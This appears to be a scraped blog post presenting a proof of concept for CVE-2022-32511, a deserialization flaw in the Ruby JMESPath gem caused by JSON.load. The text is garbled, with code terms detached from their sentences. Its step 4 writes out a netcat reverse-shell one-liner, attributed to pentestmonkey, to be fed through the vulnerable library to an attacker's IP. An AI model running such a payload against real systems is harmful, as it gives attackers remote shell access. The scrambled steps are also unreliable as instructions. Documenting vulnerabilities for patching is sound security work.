Description Affected versions of this package are vulnerable to Deserialization of Untrusted Data due to the usage of , which is considered unsafe when used with untrusted input. JSON.load Proof-of-concept In order to reproduce the steps we first require to install ‘JMESPath 1.6.0’ or before: 2. To import the library fire ‘ with the following mentioned command: Interactive Ruby Shell’ irb 3. In case you don’t have ‘irb’ installed then use the following command to download the same: gem install IRB 4. Pick the desired payload, I have picked one from : pentestmonkey rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 'IP' 1234 >/tmp/f 5. Finally, import the vulnerable ‘JMESPath’ library and supply the payload to execute the reverse shell: Conclusion It is recommended to use instead of . In this case, we observed that the has failed to validate the input data which leads to Remote Code Execution. JSON.parse JSON.load JSON.load

Here’s a Proof-Of-Concept for CVE-2022–32511 to Gain Remote Code Execution

Too Long; Didn't Read

@heydanny

RELATED STORIES